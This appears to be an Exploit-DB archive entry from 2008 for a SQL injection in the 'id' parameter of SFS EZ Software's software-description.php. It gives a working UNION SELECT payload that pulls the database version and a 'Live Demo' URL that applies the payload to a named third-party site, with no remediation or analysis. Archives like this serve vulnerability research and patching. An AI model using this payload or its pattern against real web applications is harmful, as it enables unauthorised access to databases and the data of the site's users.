EXPLOITS

SFS EZ Software - 'id' SQL Injection

Author: x0r
type: webapps
platform: php
port: 
date_added: 2008-10-30  
date_updated: 2016-12-30  
verified: 1  
codes: OSVDB-49545;CVE-2008-6237  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6915.txt  

-=====================================-
Application : SFS EZ  Software
Risk : High
FOund By: x0r
-=====================================-

Exploit: software/software-description.php?id=-5 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

Live Demo:
http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

-=EOF=-

# milw0rm.com [2008-10-31]